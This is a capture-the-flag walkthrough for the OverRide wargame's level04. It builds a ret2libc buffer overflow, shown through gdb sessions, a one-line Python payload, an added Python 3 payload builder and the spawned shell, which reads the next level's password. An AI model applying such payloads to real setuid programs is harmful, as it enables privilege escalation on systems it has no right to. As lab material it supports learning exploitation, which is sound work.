OverRide/level04/Ressources/walkthrough.md

The `/bin/sh` string that `system()` will run is placed in the environment first, under the name `EGG`. The value is a long run of spaces followed by `/bin/sh`; the rendered file collapses that run to a single space, but gdb below prints it as `' ' <repeats 200 times>...`. `sh -c` ignores leading whitespace, so the pointer handed to `system()` only has to land somewhere inside the spaces, not on the exact start of the string.

The binary forks (`[New process 1813]`, and `child is exiting...` on the way out) and the overflow happens in the child, so gdb is told to follow the child. Note that `b main+150` is not a valid location expression; the `*` form `b *main+150` is.

```
level04@OverRide:~$ export EGG=" /bin/sh"
level04@OverRide:~$ gdb level04
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done.
(gdb) b main+150
Function "main+150" not defined.
Make breakpoint pending on future shared library load? (y or [n]) ^Cn
(gdb) Quit
(gdb) b *main+150
Breakpoint 1 at 0x804875e
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/users/level04/level04
[New process 1813]
Give me some shellcode, k
[Switching to process 1813]

Breakpoint 1, 0x0804875e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) p (char *)getenv("EGG")
$2 = 0xffffd857 ' ' <repeats 200 times>...
(gdb) exit
Undefined command: "exit".  Try "help".
(gdb) quit
A debugging session is active.

	Inferior 2 [process 1813] will be killed.

Quit anyway? (y or n) y
child is exiting...
```

Two values come out of the session: the address of `system()` in libc, `0xf7e6aed0`, and the address of the `EGG` string on the stack as gdb sees it, `0xffffd857`. Checking the environment outside gdb:

```
level04@OverRide:~$ env
TERM=xterm-256color
SHELL=/bin/bash
SSH_CLIENT=10.0.2.2 59932 4242
OLDPWD=/home/users/level04
SSH_TTY=/dev/pts/0
EGG= /bin/sh
USER=level04
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/level04
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/home/users/level04
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/users/level04
LANGUAGE=en_US:en
LOGNAME=level04
SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
```

A process started directly does not get the same environment and argv as one started under gdb, so the string does not sit at the same stack address as in the debugger. The exploit therefore uses `0xffffd8a0` rather than `0xffffd857`: 0x49 bytes further along, which is still inside the space sled, so `system()` still receives a string that `sh` reads as `/bin/sh`.

The payload is 156 bytes of padding up to the saved return address, then the address of `system()`, then a 4-byte fake return address (four spaces; the rendered file collapses them to one), then the pointer to the string. When the overwritten return address is popped into EIP, ESP points at the fake return address and `system()` finds its argument in the slot above it. Python 2's `print` appends the newline that ends the read. The home directory was not writable, hence the `chmod +w .`. `cat exploit.txt -` keeps stdin open after the payload so commands can be typed into the shell that `system()` spawns.

```
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+'    '+'\xa0\xd8\xff\xff')" > exploit.txt
-bash: exploit.txt: Permission denied
level04@OverRide:~$ chmod +w .
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+'    '+'\xa0\xd8\xff\xff')" > exploit.txt
level04@OverRide:~$ cat exploit.txt - | ./level04
Give me some shellcode, k
whoami
level05
cat /home/users/level05/.pass
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
```
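The same ret2libc frame built in Python 3 as an added example; this is not the walkthrough's own code. The addresses and the 156-byte padding are the ones observed above on the OverRide VM (an assumption for any other machine: resolve `system()` and the stack address of `EGG` yourself). It also checks the property the space sled relies on, that a pointer landing anywhere inside the spaces still yields `/bin/sh`; the 73-byte gap between the gdb address and the real one is the case from the page.

```python
#!/usr/bin/env python3
"""Build the level04 ret2libc payload and sanity-check its layout.

Added example, not code from the walkthrough. Constants are the values
observed on the OverRide VM above; they are assumptions elsewhere.
"""
import struct
import sys

PAD_LEN = 156               # bytes from the start of the buffer to saved EIP
SYSTEM_ADDR = 0xf7e6aed0    # `p system` in gdb on the VM
EGG_ADDR = 0xffffd8a0       # pointer into the space sled of $EGG (outside gdb)
GDB_EGG_ADDR = 0xffffd857   # where gdb showed $EGG; 0x49 bytes earlier
FAKE_RET = b"    "          # where system() returns to; only reached once sh exits


def p32(value):
    """Pack a 32-bit little-endian address (x86)."""
    return struct.pack("<I", value)


def build_payload(pad_len=PAD_LEN, system_addr=SYSTEM_ADDR,
                  arg_addr=EGG_ADDR, fake_ret=FAKE_RET):
    """ret2libc frame: [padding][&system][fake return][&"/bin/sh"].

    When `ret` pops the overwritten saved EIP into EIP, ESP points at
    fake_ret, so system() reads arg_addr as its first argument at ESP+4.
    """
    if len(fake_ret) != 4:
        raise ValueError("fake return address must be exactly 4 bytes")
    payload = b"A" * pad_len + p32(system_addr) + fake_ret + p32(arg_addr)
    # The program reads a line: a 0x0a byte inside the payload would cut it short.
    if b"\n" in payload:
        raise ValueError("payload contains a newline; the read would stop early")
    return payload


def make_egg(n_spaces):
    """Value for $EGG: a sled of spaces in front of /bin/sh.

    sh -c ignores leading whitespace, so system() on any pointer that lands
    inside the spaces still runs /bin/sh. That slack is what lets the gdb
    address and the real one differ without breaking the exploit.
    """
    return " " * n_spaces + "/bin/sh"


def lands_ok(egg, offset):
    """True if a pointer `offset` bytes into `egg` still names /bin/sh."""
    return 0 <= offset < len(egg) and egg[offset:].strip(" ") == "/bin/sh"


if __name__ == "__main__":
    # Write raw bytes, not str: \xd0 etc. must not be re-encoded as UTF-8.
    sys.stdout.buffer.write(build_payload() + b"\n")
```

Run it as `python3 payload.py > exploit.txt` (file name is a placeholder) and feed it exactly as the walkthrough does, `cat exploit.txt - | ./level04`, after exporting `EGG` with a long run of spaces, for instance `export EGG="$(python3 -c 'print(" "*300 + "/bin/sh")')"`.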